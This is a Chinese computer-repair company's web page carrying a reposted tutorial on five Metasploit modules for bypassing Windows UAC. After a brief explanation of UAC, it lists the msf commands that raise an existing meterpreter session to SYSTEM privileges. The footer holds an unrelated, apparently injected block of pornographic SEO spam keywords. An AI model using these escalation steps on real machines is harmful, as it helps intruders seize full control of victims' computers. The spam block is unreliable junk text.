錦州市廣廈電腦維修|上門維修電腦|上門做系統|0416-3905144熱誠服務,錦州廣廈維修電腦,公司IT外包服務
topFlag1 設為首頁
topFlag3 收藏本站
 
maojin003 首 頁 公司介紹 服務項目 服務報價 維修流程 IT外包服務 服務器維護 技術文章 常見故障
錦州市廣廈電腦維修|上門維修電腦|上門做系統|0416-3905144熱誠服務技術文章
利用metasploit繞過UAC的5種方式

作者: 佚名  日期:2018-11-10 14:47:08   來源: 本站整理

 大家好,今天,我們將淺析用戶帳戶控制(簡稱UAC)。我們還將了解它如何保護你免受惡意軟件的入侵,如若忽略UAC提示,可能會對你的系統造成不良影響。
目錄
· UAC簡介
· UAC是什么
· UAC工作原理
5種繞過UAC的方法
1.Windows升級UAC保護繞過
2.Windows升級UAC保護繞過(內存注入繞過)
3.Windows UAC保護繞過(FodHelper注冊表鍵值繞過)
4.Windows升級UAC保護繞過(Eventvwr注冊表鍵值繞過)
5.Windows升級UAC保護繞過(COM Handler劫持繞過)
用戶賬戶控制(UAC)介紹
什么是用戶賬戶控制?
在Microsoft Windows Vista和Windows Server 2008操作系統中引入了結構良好的用戶帳戶控制,因為不必要的系統范圍的更改是難以避免的,而UAC策略可以防止這種更改,并且只需要很少的工作量。
換句話說,它是Windows的一項安全功能,它可以讓我來防止對操作系統進行未經授權的修改。UAC確保某些修改只能在administrator授權下才能進行。如果administrator不允許更改,則不會執行這些更改,Windows保持不變。
UAC工作原理?
UAC阻止程序執行涉及系統更改/特定任務的任何任務。除非嘗試執行它們的進程以管理員權限運行,否則這些操作將無法運行。如果以管理員身份運行程序,它會具有更多權限,因為與未以管理員身份運行的程序相比,它的權限得到了提升。
沒有管理員權限就無法完成的一些事情:
· 注冊表修改(如果注冊表項在HKEY_LOCAL_MACHINE下(因為它影響多個用戶),它將是只讀的)
· 加載設備驅動程序
· DLL注入
· 修改系統時間(時鐘)
· 修改用戶帳戶控制設置(通過注冊表,可以啟用/禁用它,但你需要正確的權限才能執行此操作)
· 修改受保護的目錄(例如Windows文件夾,Program Files)
· 計劃任務(例如,以管理員權限自動啟動)
UAC不會自動阻止惡意軟件,目的并不是判斷程序是否是惡意軟件。是不是惡意軟件還是得取決于用戶。如果要以管理員權限執行程序,UAC將提醒用戶并且需要用戶進行確認。
另請閱讀:UAC的重要性及如何保護你的安全
繞過UAC的5中方法
首先對目標機器進行漏洞利用以獲取meterpreter會話。獲得meterpreter會話1后,輸入以下命令以檢查系統權限和特權。
getsystem
getuid
如果你沒有系統/管理員權限,那么你就需要繞過目標系統的UAC保護。
Windows升級UAC保護繞過
此模塊將通過進程注入利用受信任的發布者證書繞過Windows UAC。這將產生第二個shell,而且UAC保護已經關閉。
msf > use exploit/windows/local/bypassuac
msf exploit windows/local/bypassuac) > set session 1
msf exploit(windows/local/bypassuac) > exploit
從下圖可以看到,又建立了一個meterpreter會話2連接,現在輸入getsystem和getuid兩條命令來查看系統權限:

太好了,我們獲得了NT AUTHORITY\SYSTEM權限。現在你只要輸入shell命令,你就會進入一個具有管理員權限的命令行窗口。
Windows升級UAC保護繞過(內存注入)
此模塊將通過進程注入利用受信任的發布者證書繞過Windows UAC。這將產生第二個shell,而且UAC保護已經關閉。此模塊使用反射DLL注入技術僅刪除DLLpayload二進制文件而不是刪除標準技術中的三個單獨的二進制文件。但是,它需要選擇正確的體系結構(對于SYSWOW64系統也使用x64)。如果指定EXE :: Custom,你的DLL應該在單獨的進程中啟動payload后調用ExitProcess()。
msf > use exploit/windows/local/bypassuac_injection
msf exploit(windows/local/bypassuac_injection) > set session 1
msf exploit(windows/local/bypassuac_injection) > exploit
從下圖中可以看出,meterpreter 會話2已經成功打開,現在輸入getsystem和getuid兩條命令來查看權限。

最終,你也會拿到NT AUTHORITY\SYSTEM權限,現在只需要輸入shell命令,就可以進入一個具有管理員權限的命令行窗口。
Windows升級UAC保護繞過(FodHelper注冊表鍵值繞過)
此模塊將通過在當前用戶配置單元下劫持注冊表中的特殊鍵并插入將在啟動Windows fodhelper.exe應用程序時調用的自定義命令來繞過Windows 10 UAC。這將產生第二個shell,而且UAC保護已經關閉。此模塊修改注冊表項,但在調用payload后清除該項。該模塊不要求payload的結構與OS匹配。如果指定EXE :: Custom,你的DLL應該在單獨的進程中啟動payload后調用ExitProcess()。
msf > use exploit/windows/local/bypassuac_fodhelper
msf exploit(windows/local/bypassuac_fodhelper) > set session 1
msf exploit(windows/local/bypassuac_fodhelper) > exploit
從下圖中,可以看到,meterpreter會話2已經成功打開,輸入getsystem和getuid兩條命令來查看權限

非常不錯,我們獲得了NT AUTHORITY\SYSTEM權限,輸入shell命令,就能拿到管理員的命令行窗口了。
Windows升級UAC保護繞過(Eventvwr注冊表鍵值繞過)
此模塊將通過在當前用戶配置單元下劫持注冊表中的特殊鍵并插入自定義命令,這個命令將在啟動Windows fodhelper.exe應用程序時調用來繞過Windows 10 UAC。這將產生第二個shell,而且UAC保護已經關閉。此模塊修改注冊表項,但在調用payload后清除該項。該模塊不要求payload的結構與OS匹配。如果指定EXE :: Custom,你的DLL應該在單獨的進程中啟動payload后調用ExitProcess()。執行命令如下:
msf > use exploit/windows/local/bypassuac_eventvwr
msf exploit(windows/local/bypassuac_eventvwr) > set session 1
msf exploit(windows/local/bypassuac_eventvwr) > exploit
從下圖中,可以看到,meterpreter會話2已經上線,輸入getsystem和getuid兩條命令來查看是否是system權限。

再一次,我們獲取了NT AUTHORITY\SYSTEM權限。
Windows升級UAC保護繞過(COM Handler劫持繞過)
此模塊將通過在HKCU配置單元中創建COM處理程序注冊表項來繞過Windows UAC。加載某些高完整性進程時,會引用這些注冊表項,從而導致進程加載用戶控制的DLL。這些DLL包含導致會話升級的payload。在payload調用后清除注冊表項修改。此模塊要求payload的體系結構與OS匹配,但當前的低權限Meterpreter會話的體系結構并不相同。如果指定EXE :: Custom,你的DLL應該在單獨的進程中啟動payload后調用ExitProcess()。此模塊通過目標上的cmd.exe調用目標二進制文件。因此,如果限制cmd.exe訪問,則此模塊將無法正常運行。
msf > use exploit/windows/local/bypassuac_comhijack
msf exploit(windows/local/bypassuac_comhijack) > set session 1
msf exploit(windows/local/bypassuac_comhijack) > exploit
如下圖所示,meterpreter會話2已經建立連接,輸入getsystem和getuid兩條命令來查看是否是system權限。

最終,還是得到了NT AUTHORITY\SYSTEM權限,同理,輸入shell獲取管理員權限的命令窗口。如此一來,我們便借助了metasploit 后滲透漏洞利用來繞過UAC保護了。
 



熱門文章
  • 機械革命S1 PRO-02 開機不顯示 黑...
  • 聯想ThinkPad NM-C641上電掉電點不...
  • 三星一體激光打印機SCX-4521F維修...
  • 通過串口命令查看EMMC擦寫次數和判...
  • IIS 8 開啟 GZIP壓縮來減少網絡請求...
  • 索尼kd-49x7500e背光一半暗且閃爍 ...
  • 樓宇對講門禁讀卡異常維修,讀卡芯...
  • 新款海信電視機始終停留在開機界面...
  • 常見打印機清零步驟
  • 安裝驅動時提示不包含數字簽名的解...
  • 共享打印機需要密碼的解決方法
  • 圖解Windows 7系統快速共享打印機的...
  • 錦州廣廈電腦上門維修

    報修電話:13840665804  QQ:174984393 (聯系人:毛先生)   
    E-Mail:174984393@qq.com
    維修中心地址:錦州廣廈電腦城
    ICP備案/許可證號:遼ICP備2023002984號-1
    上門服務區域: 遼寧錦州市區
    主要業務: 修電腦,電腦修理,電腦維護,上門維修電腦,黑屏藍屏死機故障排除,無線上網設置,IT服務外包,局域網組建,ADSL共享上網,路由器設置,數據恢復,密碼破解,光盤刻錄制作等服務

    技術支持:微軟等
    主站蜘蛛池模板: 国产精品无码亚洲一区二区三区| 无码人妻精品一区二区三区99仓本| 久久AV高潮AV无码AV| 亚洲一区二区无码偷拍| 一本大道无码人妻精品专区| 亚洲av日韩av无码| 狼人无码精华AV午夜精品| 亚洲AV无码成人精品区蜜桃| 精品亚洲av无码一区二区柚蜜| 人妻丰满熟妇A v无码区不卡| 中文字幕无码免费久久9一区9| 亚洲熟妇无码av另类vr影视| 国产产无码乱码精品久久鸭| 免费人成无码大片在线观看| 人妻少妇看A偷人无码电影| 国产精品无码v在线观看| 亚洲AV无码精品国产成人| 久久久久无码国产精品一区| 国产成人无码区免费内射一片色欲| 无码中文av有码中文av| 久久久无码精品亚洲日韩按摩 | 色国产色无码色欧美色在线| 亚洲成a人片在线观看无码专区| 亚洲AV无码乱码精品国产| 亚洲国产精品无码观看久久| 最新亚洲春色Av无码专区| 欧洲人妻丰满av无码久久不卡 | 久久久久亚洲AV无码永不| 成人无码网WWW在线观看| 午夜成人无码福利免费视频| 国产在线精品无码二区二区| 男男AV纯肉无码免费播放无码| 久久久久精品国产亚洲AV无码| 国产免费无码一区二区| 国产精品无码a∨精品| 亚洲国产精品无码AAA片| 无码一区二区三区老色鬼| 无码人妻精品一区二区三区99仓本| 亚洲AV永久无码精品成人| 久久久久亚洲Av片无码v| 亚洲AV无码不卡无码|